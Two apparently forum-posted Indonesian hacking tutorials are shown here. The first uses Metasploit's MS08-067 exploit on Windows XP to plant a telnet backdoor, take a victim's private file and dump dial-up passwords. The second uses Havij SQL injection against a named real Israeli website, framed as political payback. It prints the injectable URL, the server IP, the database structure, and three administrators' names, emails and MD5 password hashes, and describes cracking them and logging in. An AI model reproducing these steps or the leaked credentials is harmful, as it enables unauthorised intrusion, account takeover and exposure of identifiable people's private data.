Disini kita akan membahas bagaimana melakukan hacking menggunakan Metasploit Framework yang ditambah dengan pemanfaatan program luar untuk mengambil informasi-informasi yang kita inginkan.

Sebagai contoh penulis akan melakukan hacking dengan memanfaatkan celah keamanan pada Server Service Could Allow Remote Code Execution – MS08-067 di Windows XP SP3. Sebenarnya penulis pernah mengisi seminar dan demo dengan materi memanfaatkan celah keamanan tersebut untuk melakukan hacking Windows XP SP2/SP3 pada bulan awal Desember 2008, celah ini sudah diketahui penulis pada ahkir oktober 2008 dari suatu situs keamanan, di sini saya share sekaligus sampai penggunaan meterpreter hingga memanfaatkan program luar untuk exploitasi password dial up.

Ok kita mulai saja

Pertama-tama untuk mengetahui siapa saja yang terkoneksi di jaringan. maka anda dapat masuk ke command prompt lalu ketikkan perintah net view lalu enter

Setelah muncul komputer-komputer di jaringan maka anda tinggal pilih mana yang akan dijadikan target, contohnya PCXPSP3, ping saja ip PCXSP3.

x

Setelah anda mengetahui komputer server anda bisa saja jika ingin melakukan scan untuk mengetahui OS apa, portnya berapa aja yang terbuka dengan NMAP atau memanfaatkan NMAP dari Metasploit Framework.

Kita langsung saja ke tahap exploitasi. Disini saya menggunakan console.

Di bawah adalah untuk masuk ke komputer target dengan payload shell/bind_tcp :

x

Untuk cara menggunakan payload meterpreter sekaligus coba-coba upload telnet backdoor

x

Setelah di upload maka kita dapat periksa di c:\ di komputer korban lalu jalankan telnet backdoor sebanyak 3x agar berjalan dengan baik.

x

Setelah itu kita dapat menggunakan Putty untuk masuk ke telnet

x

Tampilan setelah masuk lewat telnet backdoor

x

Sekarang kita coba misalkan ingin mendownload file dari komputer korban, misal file fotorahasia.jpg

x

Di bawah ini adalah contoh perintah untuk mendownload file fotorahasia.jpg dengan menggunakan meterpreter.

x

Kita coba sekarang mencoba mengexploitasi untuk mendapatkan password dial up yang disimpan oleh komputer korban, kita upload program untuk mengambil password dial up yang disimpan oleh Windows yaitu dial.exe

x

Setelah di upload kita gunakan perintah : dial /stext (nama file).

x

Setelah menjadi file, di contoh menggunakan nama file pass.txt, tinggal kita buka isi file pass.txt dengan perintah : type pass.txt

x

Binggo, kita mendapatkan password dial up.

Havij Vers 1.10 , sebuah tool yang powerfull untuk mendapatkan akses admin dengan teknik sql injection. untuk informasi dan download tool ini bisa anda temukan di thread dibawah ini (Hey r3dm0v3.. u coded an awesome tool)
CODE: SELECT ALL
http://forum.xcode.or.id/viewtopic.php?f=100&t=39403


Ok saya asumsikan anda sudah download dan install di mesin anda. sekarang mari kita coba salah satu website milik Israel.. (hmmm.... kenapa salah satu website di negara anda dijadikan kelinci disini sangat berkaitan erat dengan agresi militer anda pada kapal relawan dunia untuk Palestina.. saya non muslim tapi arogansi Israel adalah buntut dari tutorial ini).

web target : http://www.xenia.co.il/index.php?page_id=93
seperti biasanya berikan tanda ' pada web tsb:
CODE: SELECT ALL
http://www.xenia.co.il/index.php?page_id='93

hasilnya dapat anda lihat pada gambar dibawah. BUG SQL Injection

Image

Sekarang jalankan tool Havij lalu masukkan link tersebut lalu klik Analize dan tunggu beberapa saat (yang ini ga sampe 1 menit)....

Image
hasilnya:

Havij 1.10 ready!
Analyzing http://www.xenia.co.il/index.php?page_id='93
Host IP: 212.150.130.231
Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
Powered-by: PHP/5.2.12
Keyword Found: mysql_num_rows():
I guess injection type is Integer?!
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 1
Target Vulnerable :D
Current DB: xeniaco_xenia

w007s...... I Got the database... sekarang klik Tables lalu klik Get Tables

Image
w007s..... I gOt the Tables from xeniaco_xenia database..
users_match
users_fav
params_parents
params_pages
params_icons
params
page_managers
page_banned
page_allowed
nuke_users
newsletter1
main_access
lpn_users_areas_maps
lpn_users_areas
ip_blocker
gallery_auth_users
form_datas
enter_rules
cat_tbl
bep_users_target
bep_users_cats
bep_pics
bep_other
bep_news
bep_links
bep_html_data
bep_files
bep_data
bep_banners
bep_addons
banners
admins
admin_titles
WhoIsOnLineTbl
WhoIsOnLineMessagesTbl
Table1


Nah .. pada tahap ini, anda perlu cari tahu... dimana letak table yang berisi informasi admin login. setelah ditelusuri ternyata terdapat pada tabel nuke_users. sekarang coba kita lihat isi kolom daripada tabel nuke_users.

Beri tanda centang pada nuke_users lalu klik Get Columns dan tunggu beberapa saat (hmmm... 10 detik aja).

Image
w007ss.... cool.. got to check it out... saya dapatkan kolom sbb

regdate
status
regkey
user_msg_to_mail
mail_check_interval
mail_pass
mail_login
mail_port
mail_server
user_level
user_rank
user_attachsig
user_posts
user_char
newsletter
counter
commentmax
theme
ublock
ublockon
bio
noscore
thold
uorder
umode
storynum
apass
pass
user_cell
user_homephone
user_theme
user_viewemail
user_sig
user_homepage
user_from
user_sign
user_dob
user_regdate
user_avatar
l_name
femail
email
uname
name uid
newsletter1


nah.. ini adalah kolom dari tabel nuke_users yang berisi informasi registrasi, nama, password, email, nomor hp dari Admin website http://www.xenia.co.il.. sekarang saya akan mencoba mendapatkan akses selanjutnya ke website ini.. hmmmm.... saya ceklis aja kolom :

name
email
pass

(kolom lain ga penting.. cuma pengen dapat username dan passwordnya aja).

lalu klik Get Data dan

Image
Hasilnya sebagai berikut :
Count(*) of xeniaco_xenia.nuke_users is 3
Data Found: name=àåãé
Data Found: email=udi@tmuna.co.il
Data Found: pass=b440097c79ba6183170f5f118b47a31d
Data Found: name=guy
Data Found: email=guy@xenia.co.il
Data Found: pass=f4384abb3921b5cf321a5a24960c4aef
Data Found: name=inbar
Data Found: email=inbar@xenia.co.il
Data Found: pass=b3f61131b6eceeb2b14835fa648a48ff

w007s.... ternyata website ini memiliki 3 administrator...
hmmmm... passwordnya di HASH alias di-enkripsi..... no problem... havij juga punya md5 hash crack..

Klik MD5 masukkan data salah satu data HASH lalu klik start (tunggu beberapa saat.... 30 detik deh). lalu hasilnya

Image
w0000000000000000000000000000007ZZZZZZZZZZZZZZZZ... password berhasil di-crack.. sekarang tinggal cari halaman login.

Klik Find Admin lalu isi Path to search dengan http://www.xenia.co.il/ lalu klik start.... .... ............. Searching

Image
Got that....
Page Found: http://www.xenia.co.il/login.php

Sekarang anda hanya tinggal ke halaman login, masukkan nama user password dan....
U gained an Access
Image
UH,,,, bahasanya sama sekali ga bisa dimengerti... :circle: